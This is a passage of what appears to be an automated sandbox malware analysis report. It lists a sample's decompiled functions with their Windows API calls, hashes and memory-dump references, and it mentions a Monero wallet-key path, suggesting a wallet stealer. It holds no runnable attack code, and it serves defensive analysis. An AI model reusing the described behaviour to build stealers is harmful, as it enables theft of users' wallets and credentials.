                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValue
                        • String ID:
                        • API String ID: 690832082-0
                        • Opcode ID: 9922885f2b0c9e0d04f67fbd305c1f96862708b7117c81954de9a259622fd65c
                        • Instruction ID: d31f0e7d22adabdfb004fd4fa33ef9291879cc265c4780986b2e122210732ce3
                        • Opcode Fuzzy Hash: 9922885f2b0c9e0d04f67fbd305c1f96862708b7117c81954de9a259622fd65c
                        • Instruction Fuzzy Hash: A441DABAD401086BDB28EBA0EC46FFE373DBB88700F044558B626571C5EA755BC89BD1
                        Function 00F16920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTime.KERNEL32(?), ref: 00F1696C
                        • sscanf.NTDLL ref: 00F16999
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F169B2
                        • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00F169C0
                        • ExitProcess.KERNEL32 ref: 00F169DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 9864edc1e743a82aaf647a0cff2552e959599e6c37aaa1b5127d6301f5f4d051
                        • Instruction ID: 02f27ec1afceee5b2e307866cd9ad3d2488b6bc3c8265f4dec2131cc03d1d1b1
                        • Opcode Fuzzy Hash: 9864edc1e743a82aaf647a0cff2552e959599e6c37aaa1b5127d6301f5f4d051
                        • Instruction Fuzzy Hash: F0212CB5D00209ABDF08EFE4E9459EEB7B9FF48300F04852EE016E3244EB345645DB65
                        Function 00F17E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F17E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F17E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0089CB10,00000000,00020119,?), ref: 00F17E5E
                        • RegQueryValueExA.ADVAPI32(?,008ADEF8,00000000,00000000,000000FF,000000FF), ref: 00F17E7F
                        • RegCloseKey.ADVAPI32(?), ref: 00F17E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 7c85a5ac0fd2f64ea65c67d619e966ec3dfea4e87e815d7b41b926eed2c04ba7
                        • Instruction ID: 7f597edcea16862c85f832635b8bfaced06f95c8a6b9948442fc33c1b4d88f2b
                        • Opcode Fuzzy Hash: 7c85a5ac0fd2f64ea65c67d619e966ec3dfea4e87e815d7b41b926eed2c04ba7
                        • Instruction Fuzzy Hash: B11191B6A84205EBD724DF94E849FBBBBB8EB04B11F104129F616A7284D77558409FA0
                        Function 00F19260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                        Download Yara Rule
                        APIs
                        • StrStrA.SHLWAPI(008AEBE8,?,?,?,00F1140C,?,008AEBE8,00000000), ref: 00F1926C
                        • lstrcpyn.KERNEL32(0114AB88,008AEBE8,008AEBE8,?,00F1140C,?,008AEBE8), ref: 00F19290
                        • lstrlen.KERNEL32(?,?,00F1140C,?,008AEBE8), ref: 00F192A7
                        • wsprintfA.USER32 ref: 00F192C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: 334a9097092bf165e0559df5cdab320e80cc3cce452b70975786af2fd2f3d901
                        • Instruction ID: e264974ee88be872d284f93797d6008cf807173ec72861d93b07c6b33f909277
                        • Opcode Fuzzy Hash: 334a9097092bf165e0559df5cdab320e80cc3cce452b70975786af2fd2f3d901
                        • Instruction Fuzzy Hash: 28014C75540108FFCB18DFECE994EAE3BB9EF44751F118548F90A97204C631AA80DB90
                        Function 00F012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F012B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F012BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F012D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F012F5
                        • RegCloseKey.ADVAPI32(?), ref: 00F012FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 5b48c29d077cef8da632719f57594d3369ca46d6c945fe0a67526befcdaeb12d
                        • Instruction ID: 46b2f46761991769b07c104a2fe8d35978d4126567ec20d346ba6fb82e8eb331
                        • Opcode Fuzzy Hash: 5b48c29d077cef8da632719f57594d3369ca46d6c945fe0a67526befcdaeb12d
                        • Instruction Fuzzy Hash: 100136B9A40209BBDB14DFD0E849FAEB7BCEF48B01F008169FA1697284D6759A418F50
                        Function 00F1C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: b54bd4563492e6aae610e5dbe63dc92fd7fd7cc091db3b66282d0137d63c1053
                        • Instruction ID: 1f353fc85b0b7753cb041c76bf62ae7a541f39699c48bc153242f885ae2549cb
                        • Opcode Fuzzy Hash: b54bd4563492e6aae610e5dbe63dc92fd7fd7cc091db3b66282d0137d63c1053
                        • Instruction Fuzzy Hash: EF41077154075C9EDB218B24CC84FFB7FF89F45714F5444E8E9CA86182D2719A84EFA4
                        Function 00F16630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00F16663
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00F16726
                        • ExitProcess.KERNEL32 ref: 00F16755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 70e8b5cc85774465d93c81ccfb2ebcc885037bbf5c652a6082c6321c9d1d9812
                        • Instruction ID: 4ef508cbf403d7ea834a58f77b55a5b32eb76544c5df942d6f0a102bc8c987cd
                        • Opcode Fuzzy Hash: 70e8b5cc85774465d93c81ccfb2ebcc885037bbf5c652a6082c6321c9d1d9812
                        • Instruction Fuzzy Hash: 8E314DB1C01218ABDB14EB90DD91FDE7778AF04710F804198F21667181DF786B89DF55
                        Function 00F187C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F20E28,00000000,?), ref: 00F1882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F18836
                        • wsprintfA.USER32 ref: 00F18850
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 242b2a8b9d6344fbe893bf834a03fb3eeeb104d778028250289549fe397539cb
                        • Instruction ID: 879c11a0affde444d68c6483d10cb42c581e05b36406dc4857182675aed5f540
                        • Opcode Fuzzy Hash: 242b2a8b9d6344fbe893bf834a03fb3eeeb104d778028250289549fe397539cb
                        • Instruction Fuzzy Hash: 9A21A5B5A80204AFDB14DF94ED45FAEBBB8FF48B01F104118F616A7284C7799941CBA0
                        Function 00F18D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00F1951E,00000000), ref: 00F18D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F18D62
                        • wsprintfW.USER32 ref: 00F18D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 69ea938fb5896ef15950b681c81c858d49a04a3656aeb9636d3477c431a96d36
                        • Instruction ID: ac61f5692d9e03bbadc998cc3b28e9d01c973e601d1c27baa7c0a968ab2a3493
                        • Opcode Fuzzy Hash: 69ea938fb5896ef15950b681c81c858d49a04a3656aeb9636d3477c431a96d36
                        • Instruction Fuzzy Hash: 1EE0E675A80209BBD724DB94E909E5977B8EF44B02F004164FD0A97244D9719E509B55
                        Function 00F0A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F18B60: GetSystemTime.KERNEL32(00F20E1A,008AAD30,00F205AE,?,?,00F013F9,?,0000001A,00F20E1A,00000000,?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F18B86
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F0A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 00F0A3FF
                        • lstrlen.KERNEL32(00000000), ref: 00F0A6BC
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 00F0A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: f0891e640c27a5e8cccdf5da07f9e91f26427a4d66761f051455b95b1ac2393f
                        • Instruction ID: 3f9944420e8422c6ecb35aae6363cd3cf2847edc7844b03c670b6cd1ad1fa7b7
                        • Opcode Fuzzy Hash: f0891e640c27a5e8cccdf5da07f9e91f26427a4d66761f051455b95b1ac2393f
                        • Instruction Fuzzy Hash: BBE136728111089BDB15FBA4DD91EEE733CAF14310F508169F51772091EF386A8EDB62
                        Function 00F0D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F18B60: GetSystemTime.KERNEL32(00F20E1A,008AAD30,00F205AE,?,?,00F013F9,?,0000001A,00F20E1A,00000000,?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F18B86
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F0D481
                        • lstrlen.KERNEL32(00000000), ref: 00F0D698
                        • lstrlen.KERNEL32(00000000), ref: 00F0D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 00F0D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
